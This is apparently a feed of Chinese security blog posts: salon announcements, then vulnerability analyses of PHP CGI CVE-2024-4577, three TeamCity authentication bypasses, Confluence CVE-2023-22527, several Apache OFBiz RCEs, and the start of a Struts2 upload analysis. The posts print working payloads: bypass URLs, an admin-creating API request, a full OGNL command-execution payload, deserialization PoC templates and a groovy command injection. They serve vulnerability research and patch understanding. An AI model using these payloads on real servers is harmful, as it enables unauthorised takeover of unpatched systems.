本次议题将与大家深入探讨抖音电商业务各个业务场景中存在的漏洞风险，并公开分享电商安全团队是如何对电商业务包括账号接管、RCE、薅羊毛、零元购在内的多个真实漏洞风险进行发现和治理，以应对不断演变的安全挑战。

安全治理视角下SRC漏洞的高效挖掘

分享人：杨俊才字节跳动无恒实验室安全工程师

｜多年甲方安全建设经验，专注于风险治理

本次议题将结合字节跳动内部漏洞治理经验，从甲方安全风险治理、业务的维度，与白帽子共同探讨探索SRC如何高效挖洞，哪些是企业更加重视的漏洞，哪些是企业安全的薄弱点。

挂图作战

分享人：樊一博长亭科技华北技术负责人

｜从事红蓝对抗/代码审计/应急响应研究工作，多次参与重大攻防演练活动并获得优异成绩

国家级红蓝演习行动日益重要，本议题将站在攻击者视角讲解HW前期蓝军准备思路、常见入口攻击手法、钓鱼思路及案例、行业攻击技战法及真实案例。

云服务常见漏洞分享

分享人：target1a 高级安全工程师、ByteSRC核心白帽

｜多个容器逃逸、数据库组件逃逸、数据库集群接管的漏洞挖掘者，单漏洞赏金大于5万元

target1a聚焦在“云服务”独特的攻击面和潜在的安全问题。分享不同云服务模型下可能出现的攻击面及案例，例如：从数据库租户环境逃逸并实现云服务基础设施的控制、从而间接接管所有云租户的数据库。希望从实际案例出发帮助企业有效的进行云服务攻击面管理和风险监控。

6月21日 14:00 火山直播

第14期字节跳动“安全范儿”技术沙龙

不见不散！

扫码预约线上直播，参与活动抽奖

转发本文至朋友圈即可参与抽奖

关于安全范儿沙龙

由字节跳动安全与风控团队发起，用沙龙形式搭建行业桥梁，与安全从业人员进行技术交流、实践分享。帮助安全人才成长，共同完善生态，促进安全行业的有序运营和蓬勃发展。拓宽安全技术视野，亦是丰富美好生活。

Empower security, Enrich life

阅读原文

跳转微信打开

关于PHP CGI Windows平台远程代码执行漏洞（CVE-2024-4577）简要说明

Fri, 07 Jun 2024 19:40:00 +0800

原创 key 2024-06-07 19:40 新加坡

关于PHP CGI Windows平台远程代码执行漏洞（CVE-2024-4577）简要说明

漏洞信息

2024年06月06日DEVCORE组织发布了漏洞通报，称其报送了PHP CGI Windows平台远程代码执行漏洞（CVE-2024-4577）。并且PHP官方也在当天发布了修复版本。

漏洞的本质就是基于CVE-2012-1823的基础上结合Windows字符编码的Best Fit特性，对其已发布的补丁进行绕过，从而继续在PHP- CGI环境下进行参数拼接，达到远程代码执行的目的。

该漏洞要求Windows操作系统需为：繁体中文、简体中文、日文，这三个其中之一的语言版本。

漏洞影响版本如下（XAMPP默认安装的配置下可以直接利用）：

        PHP 8.3 < 8.3.8
        PHP 8.2 < 8.2.20
        PHP 8.1 < 8.1.29

简要说明

CVE-2012-1823

早在2017年PHITHON师傅已经对CVE-2012-1823漏洞进行过分析和文章分享。

简要概括就是，当将PHP的环境设为CGI模式下运行时，请求参数部分就会带入作为php-cgi.exe的参数，因此可以通过-d来设定参数allow_url_include、auto_prepend_file（勾起N年前学文件包含的回忆），将完整的参数信息（需要URL编码）带入到请求参数中，发送请求达到代码执行的目的。

CVE-2024-4577

补丁分析

根据PHP漏洞修复的Commit提交信息来看，在cgi_main.c文件中，原有的逻辑新增了对Windows环境的单独逻辑判断，并且其中对请求参数使用了WideCharToMultiByte函数，即宽字节的转换。

因此结合已知的漏洞信息，确认此处是编码问题导致的。也就表示我们需要绕过的逻辑是if(*p == '-')，即请求参数第一个字符不能为-。

结合补丁信息我们知道在带入参数拼接前，宽字节会被转换。所以，以简体中文的Windows版本（在Windows中使用Page 936表示GBK编码）为例，对应的编码表信息，我们可以在该链接中找到：https://www.unicode.org/Public/MAPPINGS/VENDORS/MICSFT/WindowsBestFit/bestfit936.txt

通过搜索我们得知0x00ad可以被解码为0x002d也就是上文中提到的-符号。

漏洞复现

下载安装XAMPP，配置好Apache的配置文件httpd-xampp.conf，使得其以CGI模式来运行.php文件。

基于CVE-2012-1823将请求参数中的-替换为%ad，带入尝试发现漏洞成功复现，也就验证了我们之前的分析。

总结

漏洞场景实际有两种，这点在DEVCORE的漏洞通报中也提到了。由于漏洞影响面积较大，因此本文仅做第一点场景的说明。

抛开漏洞场景，这个漏洞启发了我，要熟悉了解各类机制、特性，组合起来就可能导致某些已修复的漏洞被再次利用。

最后引用猪猪侠的话：知识面决定攻击面。

参考链接

DEVCORE组织发布的漏洞通报：https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability/

PHP漏洞修复的Commit提交信息：https://github.com/php/php-src/commit/4dd9a36c16#diff-680b80075cd2f8c1bbeb33b6ef6c41fb1f17ab98f28e5f87d12d82264ca99729R1798

PHP-CGI远程代码执行漏洞（CVE-2012-1823）分析：https://www.leavesongs.com/PENETRATION/php-cgi-cve-2012-1823.html

阅读原文

跳转微信打开

TeamCity身份验证绕过漏洞分析（CVE-2024-23917、CVE-2024-27198、CVE-2024-27199）

Wed, 27 Mar 2024 18:16:00 +0800

原创元亨-blckder02 2024-03-27 18:16 浙江

攻击者可以精心设计一个 URL，以避免所有身份验证检查，从而允许未经身份验证的攻击者直接访问需要身份验证的端点。未经身份验证的远程攻击者可以利用此漏洞完全控制易受攻击的 TeamCity 服务器，并泄露服务器上有限数量的敏感信息等。

1. 前言

1-1. 简介

TeamCity是一款由JetBrains开发的持续集成和持续交付（CI/CD）服务器。它提供了一个强大的平台，用于自动化构建、测试和部署软件项目。TeamCity支持多种编程语言和开发环境，并提供了丰富的功能和工具，帮助开发团队构建和交付高质量的软件。

本文简单分析了三个身份验证绕过的漏洞CVE-2024-23917、CVE-2024-27198、CVE-2024-27199。

1-2. 环境搭建

下载地址：https://blog.jetbrains.com/teamcity/2024/02/critical-security-issue-affecting-teamcity-on-premises-cve-2024-23917/

下载对应版本的 TeamCity，按引导进行安装。

创建管理员账号。

2. CVE-2024-23917

官方公告

https://blog.jetbrains.com/teamcity/2024/02/critical-security-issue-affecting-teamcity-on-premises-cve-2024-23917/

漏洞描述

该漏洞会使未经身份验证的攻击者能够通过 HTTP(S) 访问 TeamCity 服务器来绕过身份验证检查并获得对该 TeamCity 服务器的管理控制。

影响版本

2023.11.2 及之前版本

2-1. 漏洞复现

未登录状态下访问/app/rest/server会跳转到登录页面，需要进行身份验证。

构造 URL 为/app/rest/server;.jsp?jsp_precompile=1，能绕过身份验证，成功获取到目标内容。

2-2. 漏洞分析

在 buildServerSpringWeb.xml 中列出了不需要身份认证就能访问的路径；

jetbrains.buildServer.server.rest.APIController 中声明了/app/rest/路径下的"/builds//statusIcon", "/builds/aggregated//statusIcon", "/server/version", "/version", "/apiVersion", "/swagger**", "/server/nodes"这些不需要身份认证。

声明了 MVC 用到的拦截器，其中 AuthorizationInterceptorImpl 是进行身份校验的拦截器。

进入 RequestInterceptors 拦截器，会进行一个 if 判断，若判断为 false 则会进入 else 遍历它下面的其他拦截器，进而调用到 AuthorizationInterceptorImpl。

若要 if 判断为真，则this.requestPreHandlingAllowed(request)需返回 false。

看一下 requestPreHandlingAllowed() 方法，if 中调用了 WebUtil.isJspPrecompilationRequest() ，返回结果是由 URI 决定的。从请求中获取 URI ，若是以.jsp或.jspf结尾的，并且传入的jsp_precompile参数不为 null，就返回 true，进而 requestPreHandlingAllowed() 返回 false。

或者进入 else 分支，满足请求路径与this.myPreHandlingDisabled中的相匹配，也会返回 false，不过这里访问路径有限制，不如 if 条件的选择自由。

requestPreHandlingAllowed() 返回 false，不用遍历子拦截器，也就避免了进行身份验证。

TeamCity 提供 REST API，用于集成外部应用程序并创建与 TeamCity 服务器的脚本交互。它允许通过 URL 路径访问资源（实体）。

访问/app/rest/swagger.json可以获取到端点列表与格式，以及功能描述。

TeamCity REST API中有较为详细的介绍，/app/rest/users用来进行用户相关的操作，这是需要进行身份验证才能访问的API，创建一个用户实体，需要的参数如下：

构造请求包，满足 URI 以.jsp或.jspf结尾，并且传入jsp_precompile参数不为 null 两个条件，创建一个用户名为user1，密码为user1user1，角色权限为SYSTEM_ADMIN的用户。

{                  "username":"user1",                  "password":"user1user1",                  "email": "123456789@qq.com",                  "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}              }

开启调试，在 RequestInterceptors.preHandle() 断点开始，

跟进 requestPreHandlingAllowed() -> WebUtil.isJspPrecompilationRequest()，此时获取到的 URI 是/app/rest/user;.jsp，jsp_precompile参数为1，满足条件，返回 true。

于是，结束 RequestInterceptors 拦截器的检查，其他拦截器不会进行拦截。

后续在路由处理中，由于 Tomcat的特性，会忽略掉;.jsp，解析到/app/rest/users对应的功能代码进行创建用户。

简单看一下 AuthorizationInterceptorImpl 的认证过程吧，进入该拦截器后，会判断当前是否有用户登录或者是否有 RememberMe 记录；

没有登录则调用isAuthenticationRequired()判断当前访问路径是否是this.myAuthorizationPaths中不需要身份验证的路径，不是就返回 false，后面进行拦截处理。

补丁下载：https://download-cdn.jetbrains.com/teamcity/plugins/internal/fix_CVE_2024_23917.zip

在 2023.11.3 版本中，this.interceptorList中增加了一个 Proxy 拦截器，会对当前请求进行拦截，导致请求失败。

3. CVE-2024-27198

官方公告

https://blog.jetbrains.com/teamcity/2024/03/additional-critical-security-issues-affecting-teamcity-on-premises-cve-2024-27198-and-cve-2024-27199-update-to-2023-11-4-now/

漏洞描述

默认情况下，TeamCity 通过 HTTP 端口 8111 公开 Web 服务器（并且可以选择配置为通过 HTTPS 运行）。攻击者可以精心设计一个 URL，以避免所有身份验证检查，从而允许未经身份验证的攻击者直接访问需要身份验证的端点。未经身份验证的远程攻击者可以利用此漏洞完全控制易受攻击的 TeamCity 服务器。

影响版本

2023.11.3及之前版本

3-1. 漏洞复现

直接访问/app/rest/server会跳转到登录页面；

构造 URL 为/hax?jsp=/app/rest/server;.jsp，即可绕过身份验证访问到目标内容。

3-2. 漏洞分析

跟踪调试看一下，会先解析/hax路由，由于这是一个不存在的路径，所以由 PageNotFoundController 处理，在获取视图时会返回404.jsp，servlet 路径为/404.html；

PageNotFoundController 是继承 BaseController 的，返回到 BaseController.handleRequestInternal()，调用 updateViewIfRequestHasJspParameter() 方法；

跟进，根据是否存在视图名称以及 servlet 路径是否以.jsp结尾生成了一个布尔值，然后调用 getJspFromRequest() 方法，从请求中获取jsp参数值，当参数值为 null 或以.jsp结尾，以及值中不包含admin/字符串，该方法就返回 true；

满足了 if 中的三个条件，就会重新将视图设置为 jsp 参数的值。

整理一下走到这一步需要的条件：

•初始返回的视图不为 View 类型，且处理的 Controller 是 BaseController的子类

•视图名称不为null，且当前响应路径不以 .jsp 结尾

•请求时传入 jsp 参数，参数值以 .jsp 结尾，且不含admin/字符串

此时视图名称变为了/app/rest/server;.jsp，jsp 参数是可控的，可以通过这种方法来访问任意需要身份验证的路径。

处理器执行完后再次进入拦截器校验，但是 AuthorizationInterceptorImpl 并没有重写 postHandle() 方法，所以不会进行拦截。

后续会像 CVE-2024-23197 一样的过程解析/app/rest/server;.jsp，在 RequestInterceptors 中，这里没有传入jsp_precompile参数，所以if (!this.requestPreHandlingAllowed(var1))为 false，进入后面的代码；

或者同样在 URL 后面拼接传入&?jsp_precompile=1，这里就能直接返回 true 了。

继续看下面，此时__tc_requestStack值为2，所以不会再遍历this.myInterceptors，略过了 AuthorizationInterceptorImpl 的校验，RequestInterceptors.preHandle() 方法返回 true。

关于新增的 Proxy 拦截器，不知道其具体内容，这里也不会拦截。于是通过所有拦截器校验，返回 true。

后续 Tomcat 会自动忽略掉;.jsp，就会解析返回/app/rest/server对应的内容。

4. CVE-2024-27199

漏洞描述

TeamCity Web 服务器中某些旁路允许在没有身份验证的情况下访问有限数量的经过身份验证的端点。未经身份验证的攻击者可以利用此漏洞修改服务器上有限数量的系统设置，并泄露服务器上有限数量的敏感信息。

影响版本

2023.11.3及之前版本

4-1. 漏洞复现

/admin/diagnostic.jsp是一个需要身份验证才能访问的路径，直接请求会跳转到登录页面；

构造 URL 为/update/../admin/diagnostic.jsp，即可成功访问。

能利用的不需要身份验证的路径有：

•/res/

•/update/

•/update/tools/content/

•/.well-known/acme-challenge/

能通过拼接绕过身份验证进行访问的路口有：

•/app/availableRunners

•/app/https/settings/setPort

•/app/https/settings/certificateInfo

•/app/https/settings/defaultHttpsPort

•/app/https/settings/fetchFromAcme

•/app/https/settings/removeCertificate

•/app/https/settings/uploadCertificate

•/app/https/settings/termsOfService

•/app/https/settings/triggerAcmeChallenge

•/app/https/settings/cancelAcmeChallenge

•/app/https/settings/getAcmeOrder

•/app/https/settings/setRedirectStrategy

•/app/pipeline

•/app/oauth/space/createBuild.html

4-2. 漏洞分析

在 RequestInterceptors 拦截器中，和之前的逻辑一样，判断请求路径是否与this.myPreHandlingDisabled中的路径相匹配；

在遍历this.myMatchingPaths时，判断请求路径是否与已定义的路径相符，匹配到了其中的/update/**，返回 true，这些路径都是不需要身份验证的路径。

于是 requestPreHandlingAllowed() 返回 false，不遍历 RequestInterceptors 的子拦截器，即不用进行身份验证。

在后续处理中，根据路径穿越符号，/update/../admin/diagnostic.jsp会处理为/admin/diagnostic.jsp，解析到视图/admin/diagnostic.html，输出对应内容。

同理，this.myMatchingPaths中的其他含有通配符的路径也可以用于绕过身份验证。

•/update/plugins/../../admin/diagnostic.jsp

•/update/tools/content/../../../admin/diagnostic.jsp

/app/agents/**不可用是因为获取到的处理器不是 NodeDiagnosticsController，视图返回的就不是/admin/diagnostic.jsp。

还有一处不需要身份验证的路径列表，就是this.myPathsNotRequiringAuthentication，当进入 AuthorizationInterceptorImpl 时会进行遍历匹配；

当请求/res/../admin/diagnostic.jsp时，会匹配到/res/**，从而顺利通过拦截器校验。

同样，this.myPathsNotRequiringAuthentication其他含有通配符，且处理器为 NodeDiagnosticsController 的路径也能进行利用。

•/.well-known/acme-challenge/../../admin/diagnostic.jsp

补丁下载：

•TeamCity 2018.2 及更高版本

•TeamCity 2018.1 及更早版本

https://forum.butian.net/share/2801

阅读原文

跳转微信打开

速抢！手慢无~元亨实验室龙年定制微信红包封面来喽！

Thu, 08 Feb 2024 11:03:00 +0800

原创元亨实验室 2024-02-08 11:03 广西

为了迎接新年的到来

元亨实验室特别定制了

微信红包封面【元亨实验室金龙送福】

限量开抢，拼手速啦！

祝大家春节快乐！

新的一年漏洞无穷，赏金无尽！

这个春节，就用它拜年吧～

阅读原文

跳转微信打开

Atlassian Confluence 模板注入漏洞分析（CVE-2023-22527）

Fri, 26 Jan 2024 17:30:00 +0800

原创元亨-blckder02 2024-01-26 17:30 浙江

Confluence 存在 Velocity 模板注入漏洞，未经身份验证的攻击者可以直接访问`*.vm`文件传入恶意 Ognl 表达式来实现 RCE。

1. 前言

跟踪调试一下命令执行的过程，其实就是表达式递归解析，有些许繁琐。

官方公告：

https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

漏洞描述：

Confluence 存在 Velocity 模板注入漏洞，未经身份验证的攻击者可以直接访问*.vm文件传入恶意 OGNL 表达式来实现 RCE。

漏洞成因：

Velocity 模板渲染时需要的参数来自于上下文中，通过向上下文中传入恶意参数值，如果没有对参数进行过滤或进行了不当的调用，就会导致注入漏洞产生。

Confluence 使用了 Struts2 框架和 Velocity 模板引擎，所以可以通过 OGNL 表达式向 Velocity 模板中嵌入 Struts2 上下文的恶意数据来进行利用。

影响版本：

Confluence Data Center and Server：

8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0 ~ 8.5.3

2. 环境搭建

下载地址：https://www.atlassian.com/software/confluence/download-archives

官网下载 8.5.3 版本，下载对应系统的安装包和源码。

具体安装步骤之前有写过：

元亨-blckder02，公众号：中孚安全技术研究Confluence 数据中心和服务器中的访问控制漏洞(CVE-2023-22515)

如果出现下面的报错，就按链接里的方法解决：http://confluence.atlassian.com/x/GAtmDg；

也就是修改下confluence.cfg.xml中 jdbc 连接的内容。

<property name="hibernate.connection.url">jdbc:mysql://localhost:3306/confluence?sessionVariables=transaction_isolation='READ-COMMITTED'property>

重新启动，搭建成功。

3. 漏洞复现

POST 请求/template/aui/text-inline.vm，传入如下回显 payload：

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new+freemarker.template.utility.Execute()).exec({"whoami"}))

label参数值解析：

#request['KEY_velocity.struts2.context']：从 request 获取 Struts2 中与 Velocity 集成的上下文对象；

.internalGet('ognl')：从上下文对象中获取 OGNL 上下文；

.findValue(#parameters.x,{})：使用 OGNL 表达式从请求参数中获取x的值。

目的就是对参数x进行表达式解析，所以通过x传入恶意表达式，就可以实现命令执行。

x参数值解析：

@org.apache.struts2.ServletActionContext：获取上下文对象；

@getResponse()：调用静态方法 getResponse()；

setHeader('X-Cmd-Response',(new+freemarker.template.utility.Execute()).exec({"whoami"}))：调用 setHeader() 设置响应头；

(new+freemarker.template.utility.Execute()).exec({"whoami"})：生成一个 Freemarker 模板引擎的 Execute 对象，调用其 exec() 方法执行命令。

4. 漏洞分析

/template/aui/text-inline.vm文件内容如下，接收$parameters中的参数，并且$parameters.label以字符串的形式传给了$stack.findValue。

Confluence 的路由表配置在confluence/WEB-INF/classes/com/atlassian/confluence/impl/webapp/UrlPattern.class，能直接访问*.vm；

Servlet 注册在confluence/WEB-INF/classes/com/atlassian/confluence/impl/webapp/Servlets.class，访问*.vm的请求是由 ConfluenceVelocityServlet 处理的。

在 ConfluenceVelocityServlet.doPost() 下断点开始跟踪，此时 context 中已经有传入的label和x两个参数；

跟进 handleRequest()，获取到当前请求的路径，并且根据/template/aui/text-inline.vm名称返回对应的模板对象。

接着跟进 mergeTemplate() 合并模板和上下文，调用 merge() 将结果输出到writer；

merge() 中创建了一个内部上下文适配器ica，用于在 Velocity 引擎中执行模板。将模板名称和模板对象都放入了这个适配器中，然后调用 render() 渲染模板，结果写到writer；

递归渲染子节点，text-inline.vm 中的第一个节点就是#set( $labelValue = $stack.findValue("getText('$parameters.label')") )；

跟进，逐步拆分节点，这里获取到参数中的label值，放入params数组中，然后获取并调用 OgnlValueStack.findValue()；

跟进 findValue()，解析并执行表达式。

拆分计算表达式，到findValue(#parameters.x, { })时，result是一个 OgnlTool 对象；

继续拆分计算，获取x的值。

返回x的值；

回到 ASTMethod.getValueBody()，此时的args就是x的值，接着调用 OgnlTool.findValue() 方法。

跟进 OgnlTool.findValue() 方法，就开始对x表达式进行解析了，继续拆分计算；

获取到 Execute 对象；

调用 exec() 方法，带入whoami参数；

在这执行命令。

然后将结果返回，调用 setHeader() 方法将结果输出到响应头的X-Cmd-Response字段中。

整体看一下 AST 语法树结构，就是一层一层节点的递归解析。

5. 补丁分析

8.5.4版本中新增了一个 ConfluenceOgnlGuard 类，用于拦截和检查 OGNL 表达式。

ConfluenceOgnlGuard 继承了org.apache.struts_struts2-core-6.3.0-atlassian-8.jar!\org\apache\struts2\ognl\StrutsOgnlGuard.class；

在将 OGNL 表达式解析成 AST 语法树结构时，会调用其中的 containsExcludedNodeType() 方法检查生成的语法树是否包含禁止的节点类型；

如果包含则会将表达式解析结果设为_ognl_guard_blocked，后面就会抛出异常，解析失败，无法执行命令。

参考链接：

https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/

https://forum.butian.net/share/2741

https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/

阅读原文

跳转微信打开

Apache OFBiz 命令执行漏洞分析

Fri, 05 Jan 2024 18:09:00 +0800

原创元亨-blckder02 2024-01-05 18:09 浙江

部分路由未使用身份验证或对身份验证不严格，以及未对传入内容进行严格校验，导致命令执行。

1. XML-RPC反序列化命令执行（CVE-2020-9496）

1-1. 前言

官方公告：

https://issues.apache.org/jira/browse/OFBIZ-11716

漏洞描述：

由于 webtools 中的 2 个 xmlrpc 相关请求（xmlrpc 和 ping）未使用身份验证，以及未对传入XML-RPC消息进行校验，所以容易受到不安全反序列化的影响。

影响版本：

Apache OfBiz 17.12.03

1-2. xml-rpc请求格式

XML内容的根元素是，每个元素都包含一个元素和一个元素。元素标识要调用的过程的名称，而元素包含参数列表和值。每个元素包括一个元素列表，而元素又包含值元素。

示例：

<methodCall>  <methodName>方法名methodName>  <params>     <param>        <value>           值元素        value>     param>  params>methodCall>

值元素类型可以是基本数据类型，也可以是复合数据类型。

基本数据类型有：

int：27, 27
double：27.31415, -1.1465
Boolean：1, 0
string：Hello, bonkers! @
dateTime.iso8601： 20021125T02:20:04
base64：SGVsbG8sIFdvcmxkIQ==

复合数据类型就是指数组和结构；

数组可以包含多种基本数据类型：

<array>  <data>     <value><boolean>1boolean>value>     <value><string>Array collection, eh?string>value>     <value><int>-91int>value>     <value><double>142.14325double>value>  data>array>

结构通常用来传递复杂的数据结构（键-值对形式）：

<struct>       键1     值1  
       键2     值2

参考链接：

http://xmlrpc.com/spec.md

https://www.yiibai.com/xml-rpc/xml_rpc_data_model.html

1-3. 环境搭建

下载地址：https://archive.apache.org/dist/ofbiz/

解压后用IDEA打开，build之后会生成一个biuld目录，添加配置ofbiz.jar；

能成功访问https://localhost:8443/webtools就说明环境搭好了。

Apache OFBiz 结构简单介绍：

applications：各个应用的目录，包含了OFBiz核心的应用程序组件，如订单管理，电子商务存储等。

framework：框架目录，包含OFBiz框架的组件，例如实体引擎和服务引擎。这是OFBiz框架的核心，其他应用程序都是基于它来构建的。

Ofbiz-component.xml：定义应用程序指定配置文件，库文件等，数据模型，业务逻辑，web应用程序的定位。

src：源文件目录，包含实现业务逻辑的Java类文件。

web.xml：用于配置 Web 应用程序的部署信息和行为，设置路由、filter等。

Controller.xml：定义view，controller之间的映射关系，不仅包含了请求的映射关系，同时还包含了视图的映射关系，以及一系列的处理器比如视图解析处理器，事件处理器等。

1-4. 漏洞复现

POST请求/webtools/control/xmlrpc，使用ysoserial工具生成一个 CommonsBeanutils1 链的payload，要用base64编码。

<methodCall><methodName>ProjectDiscoverymethodName><params>    <param>    <value>        <struct>        <member>            <name>testname>            <value>            <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">           base64 payload            serializable>            value>        member>        struct>    value>    param>params>methodCall>

发送请求，dnslog成功收到请求信息。

1-5. 漏洞分析

入口/webtools/control/xmlrpc的路由配置在\framework\webtools\webapp\webtools\WEB-INF\web.xml，由ControlServlet处理；

直接下断点开始跟踪调试，提取了一堆值，然后调用requestHandler.doRequest()处理具体请求；

跟进，requestMap是从\framework\webtools\webapp\webtools\WEB-INF\controller.xml中获取到的xmlrpc相关处理器；

跟进RequestHandler.runEvent()方法，调用XmlRcpEventHandler处理 XML-RPC 请求，传递必要的参数，然后获取并保存事件处理器执行后的返回结果。

跟进，调用getRequest()获取信息对象；

先依次扫描、、、、元素标签，记录它的值；

读到标签，返回一个MapParser对象；

重复调用XmlRpcRequestParser.startElement()，继续读取元素标签及其值；

读到标签和使用的XML-RPC 扩展库链接时，跟进到RecursiveTypeParserImpl.startElement()，只有当pURI与EXTENSIONS_URI相同时，才能匹配且返回SerializableParser对象，所以payload中必须要添加这个扩展库；

SerializableParser是继承ByteArrayParser的，所以跟进到ByteArrayParser.startElement()，创建了一个base64解码器，将payload解码写入baos中。

然后开始扫描结束标签，扫描到标签，将payload的字节码设为result；

接着扫描到标签，解析SerializableParser对象中的result添加到到结果中；

跟进SerializableParser.getResult()，对payload字节数组进行了反序列化，触发命令执行。

1-5-1. 使用 array 标签

前面使用的是 struct 结构传入数据，扫描到标签返回的是MapParser对象，MapParser.endElement()中调用了父类RecursiveTypeParserImpl.endValueTag()，进而调用SerializableParser.getResult()。

同理，ObjectArrayParser.endElement()中也调用了父类RecursiveTypeParserImpl.endValueTag()，所以也可以使用标签构造传入数组数据触发反序列化。

poc：

    <methodCall>        <methodName>ProjectDiscoverymethodName>        <params>            <param>                <value>                   <array>                        <data>                            <value>                                 <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">                                     base64 payload                                 serializable>                            value>                        data>                    array>                value>            param>        params>    methodCall>

1-6. 补丁分析

补丁链接：https://github.com/apache/ofbiz-framework/commit/d955b03

在controller.xml中对/xmlrpc和/ping路由添加了身份校验。

但是身份校验仍然可以绕过，产生POST-Auth漏洞（OFBIZ-12332）：

https://issues.apache.org/jira/browse/OFBIZ-12332

又在后续补丁中添加CacheFilter对/control/xmlrpc和进行校验，但是还是可以绕过。

2. XML-RPC反序列化命令执行（CVE-2023-49070）

2-1. 前言

官方通告：

https://issues.apache.org/jira/browse/OFBIZ-1281

https://lists.apache.org/thread/jmbqk2lp4t4483whzndp5xqlq4f3otg3

漏洞描述：

由于对CVE-2020-9496修复的不完全，导致可以绕过路径检查和授权检查触发恶意数据的反序列化。

影响版本：

Apache OfBiz < 18.12.10

2-2. 漏洞复现

环境搭建操作与CVE-2020-9496一样，这里用18.12.09复现。

用CVE-2020-9496的poc进行测试，可以看到调用了CacheFilter进行路径和标签的检查，检查失败出现报错。

在url中略作修改，即可绕过路径检查和授权检查，成功执行命令。

/webtools/control/xmlrpc/;/?USERNAME=ofbiz&PASSWORD=blckder02&requirePasswordChange=Y

说一下url的构造，这个请求结构如下：

路径信息：/webtools/control/xmlrpc/
矩阵参数：;/
查询参数：?USERNAME=ofbiz&PASSWORD=blckder02&requirePasswordChange=Y

矩阵参数（Matrix Parameters）是一种在URL中传递参数的方式，其特点是使用分号;将参数附加在路径中。

这里就是附加了一个参数/，或许将参数换成;1要好理解一点，效果一样的。

与查询参数不同的是，使用getRequestURI()的返回结果会包含矩阵参数，所以能绕过路径检测。但是getPathInfo()仍然只返回/xmlrpc/，不影响后面xmlrpc处理器的调用。

查询参数的内容则是绕过授权检查的必要条件。

2-3. 漏洞分析

在发送请求的时候会进入CacheFilter.doFilter()，因为在uri的末尾添加了/;/，所以不会进入if语句，也就不会对进行校验；

然后进入ControlServlet处理请求，在RequestHandler.doRequest()中，securityAuth就是指Controller.xml中的security标签的值，为true则进入if分支；

跟进，调用JavaEventHandler处理该事件；

进入LoginWorker.checkLogin()，如果检测到是未登录状态，则直接从请求中获取USERNAME和PASSWORD参数的值，如果值为null，则会进入343行的if语句，返回error，表示校验失败；

参数值不为null，还需要使login(request, response)不返回error。

进入login()，从请求中获取了requirePasswordChange参数的值，执行登录操作时由于传入的用户名是随便构造的，所以返回“没有找到用户”，登录失败，进入else分支；

最后根据requirePasswordChange的值判断是返回参数值还是error，所以只要传入requirePasswordChange为true，这里就可以返回true了。

回到checkLogin()，uri中不包含loginout，security.login.authorised.during.impersonate默认为false，登录历史也为null，所以跳过if语句，最后返回success，成功绕过登录检测。

后面的反序列化调用过程就与CVE-2020-9496一样了。

2-4. 补丁分析

补丁链接：https://github.com/apache/ofbiz-framework/commit/c59336f604f503df5b2f7c424fd5e392d5923a27

在补丁中删除了XML-RPC的相关引用。

3. groovy命令执行（CVE-2023-51467）

3-1. 前言

官方公告：

https://lists.apache.org/thread/9tmf9qyyhgh6m052rhz7lg9vxn390b

https://issues.apache.org/jira/browse/OFBIZ-12873

漏洞描述：

仍然是基于对CVE-2020-9496修复的不完全，导致可以绕过路径检查和授权检查。以及对传入数据的校验不完善，导致可以通过groovy实现命令执行。

影响版本：

Apache OfBiz < 18.12.11

3-2. 漏洞复现

添加groovyProgram参数传入要执行的命令，payload：

/webtools/control/ProgramExport?USERNAME=ofbiz&PASSWORD=blckder02&requirePasswordChange=Y&groovyProgram='calc.exe'.execute()

3-3. 漏洞复现

授权检查绕过的过程与CVE-2023-49070的一致，这里就不重复了。

从绕过授权后开始看，在RequestHandler.doRequest()中，requestUri为ProgramExport，获取到对应的requestMap，又从中获取到success对应的响应，赋给了nextRequestResponse；

在controller.xml中定义了响应类型为view，名称为ProgramExport，然后调用renderView()进行视图渲染。

跟进renderView()，从controller.xml中获取名称为ProgramExport的视图映射，定义在 component://webtools/widget/EntityScreens.xml#ProgramExport文件中；

获取到screen类型的视图处理器；

一直跟进，从EntityScreens.xml中获取到了ProgramExport对应的脚本文件位置component://webtools/groovyScripts/entity/ProgramExport.groovy，当遍历到此文件时跟进；

检测到文件后缀为.groovy，运行这个脚本文件；

进入ProgramExport.groovy，从传入的参数中获取到了groovyProgram参数值，最后调用evaluate()执行命令。

其中还调用了SecuredUpload.isValidText()对groovyProgram进行黑白名单校验，黑名单内容来自\framework\security\config\security.properties#deniedWebShellTokens，白名单就是import。

3-4. 补丁分析

补丁地址：https://github.com/apache/ofbiz-framework/commit/ee02a33509

修复了授权检查的地方，在登录失败后直接返回error，而不是再去判断requirePasswordChange的值。

参考链接：

https://xz.aliyun.com/t/13168

https://xz.aliyun.com/t/8184/

https://xz.aliyun.com/t/13211

https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/

https://mp.weixin.qq.com/s/iAvitO6otPdHSu1SjRNX3g

https://cwiki.apache.org/confluence/display/OFBIZ/Understanding+the+OFBiz+Widget+Toolkit

阅读原文

跳转微信打开

Apache Struts2 文件上传漏洞分析（CVE-2023-50164）

Fri, 22 Dec 2023 08:40:00 +0800

原创元亨-blckder02 2023-12-22 08:40 浙江

攻击者可以操纵文件上传参数以启用路径遍历，在某些情况下，这可能导致上传可用于执行远程代码执行的恶意文件。

1. 前言

官方公告：
https://cwiki.apache.org/confluence/display/WW/S2-066

漏洞描述：
攻击者可以操纵文件上传参数以启用路径遍历，在某些情况下，这可能导致上传可用于执行远程代码执行的恶意文件。

影响版本：
Struts 2.0.0 - Struts 2.3.37 (EOL)
Struts 2.5.0 - Struts 2.5.32
Struts 6.0.0 - Struts 6.3.0

2. 环境搭建

新建一个项目，Archetype 选择org.apache.maven.archetypes:maven-archetype-webapp；

